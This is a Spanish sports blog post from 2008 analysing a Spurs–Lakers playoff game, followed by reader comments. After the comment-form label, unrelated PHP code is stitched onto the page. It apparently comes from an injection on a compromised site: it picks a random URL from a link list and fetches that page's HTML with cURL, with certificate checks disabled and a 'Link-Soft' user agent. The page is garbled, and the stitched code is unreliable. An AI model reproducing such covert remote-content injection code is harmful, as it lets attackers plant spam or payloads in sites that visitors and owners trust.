Enigma en el Staples (SAS 85 – LAL 89)

22 de May de 2008 por TheDeerHunter

¿Cual es el motivo de que Kobe Bryant únicamente tirara tres veces a canasta durante toda una primera parte? ¿Cómo es posible que los maestros de maestros del control de los partidos tiraran una ventaja de 20 puntos en cuarto y medio contra un equipo más joven e inexperto?

Emocionante aperitivo de lo que nos viene encima nos brindaron los dos contendientes anoche. Gran partido, sin duda, pero analizándolo fríamente se trata de uno de los más desconcertantes que hemos presenciado en lo que va de playoffs.

Desde siempre, Phil Jackson nos tiene acostumbrados a decisiones inexplicables a los ojos de los aficionados. Ha llegado incluso a tirar a la basura partidos importantes por mantener a un jugador en cancha demasiado tiempo cuando lo está haciendo rematadamente mal, hacer descansar a sus estrellas más de la cuenta, no pedir un tiempo muerto cuando lo lógico sería hacerlo… Posteriormente, la explicación de muchas de esas decisiones ha venido a nuestros ojos cuando nos hemos percatado de mejoras globales que van más allá del provecho puntual que hubiera podido obtener de aquellos aparentes errores… aunque en otras ocasiones no ha sido así. Esto, añadido a su propia imagen, le rodean de un halo de misterio con el que muchas veces resulta complicado desentrañar lo que se trata de una casualidad propia de las circunstancias de cada partido de lo que forma parte de un plan maestro superior que todavía no se explica ante nuestros inexpertos ojos.

No cabe duda de que Bowen es un duro hueso y que, en teoría, Kobe tiene problemas físicos. No obstante, es difícil imaginar que ese sea el factor real que determinó la increíble actuación bipolar del 24 anoche. ¿Problemas de espalda? Hasta de eso dudamos ya… Según el propio Popovic “Kobe se dedicó a tratar de dar confianza a sus compañeros en la primera parte. Por eso llevaba 5 asistencias mientras iba analizando donde iba a establecer su territorio. En la segunda parte se puso a trabajar.” ¿Tan frío y calculador es Kobe como para dejar escapar a San Antonio 20 puntos y saber que los iba a remontar? Tampoco parece demasiado cierto.

Probablemente no sabremos a ciencia cierta qué es lo que pasó. Lo que si vimos fue la mejor cara defensiva de L.A. en la segunda parte, con dos factores sorprendentes que sí son claro mérito del Maestro Zen. Gasol inconmensurable cerrando la zona y Vujacic más que alucinante defendiendo a Ginobili. Si Phil Jackson logra sacar de estos dos un gran rendimiento defensivo es que lo puede todo. Los Spurs se vinieron abajo en la segunda parte. No hay que olvidar que hace dos días terminaron de pegarse una panzada a jugar contra Nueva Orleans y por lo tanto la gran actuación defensiva de Lakers también queda bajo sospecha. El caso es que así y todo fue prácticamente un milagro que se les escapara la victoria.

Por lo tanto ¿qué podemos extrapolar del partido de anoche? Poca cosa. Cada partido es un mundo. Veremos qué pasa el viernes.

Comenta

5 comentarios a esta entrada

  1. Red dice:
    #1

    Espero las referencias de Newtoniano sobre la sobrecogedora imagen de Ira Newble con el puño (cerrado) en alto antes de terminar el partido XD

    Por momentos pensé que Duncan le haría un roto a Gasol (y por momentos se lo hizo)
    pero éste hizo un final de partido espléndido defensivamente… Kobe por momentos me puso nervioso, y por momentos me hizo levantar de la cama… joder, que remontadón! Grande Vujacic, Odom ayer fue un lastre absoluto, espero que no se obceque en esas entraditas… Y al 3er (?¿) dia, Farmar resucitó… por momentos.
    Hacerlo contra los Spurs, y con un triple al poco de empezar viniendo de donde venía es de grande…

      Citar

  2. xapa_croack dice:
    #2

    Soberbio Ira. Red,,parecía un pantera negra,,pero rollo mestizo,,,parecía una pantera-puma negra.

    Gran remontada, sí señor, y muy buena defensa tanto de las entradas de Manu y Parker,,como de los balones al poste a Timeteo el de la Isla.

      Citar

  3. Viva_Dirk dice:
    #3

    Lo mas sorprendente la defensa de Sasha sobre Manu, sin duda. A Odom cuando penetra de esa manera a ver si le pitan alguna falta, que hacerselas se las hacen.

      Citar

  4. Dantley dice:
    #4

    20 puntos ¡¡¡ Eso les debe pesar para próximos partidos incluso aunque tengan ventaja.

      Citar

  5. Gallis dice:
    #5

    Ufff, si fuera cualquier otro equipo, puede…pero estos Spurs se pueden levantar de esta sin mayores problemas. A ver si ganamos el segundo, porque habríamos recorrido mucho…

    Por cierto, yo reconozco que si un jugador rival del nivel defensivo de Vujacic hubiera defendido a Kobe como Sasha defendió a Manu, creería que la vida no es justa…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>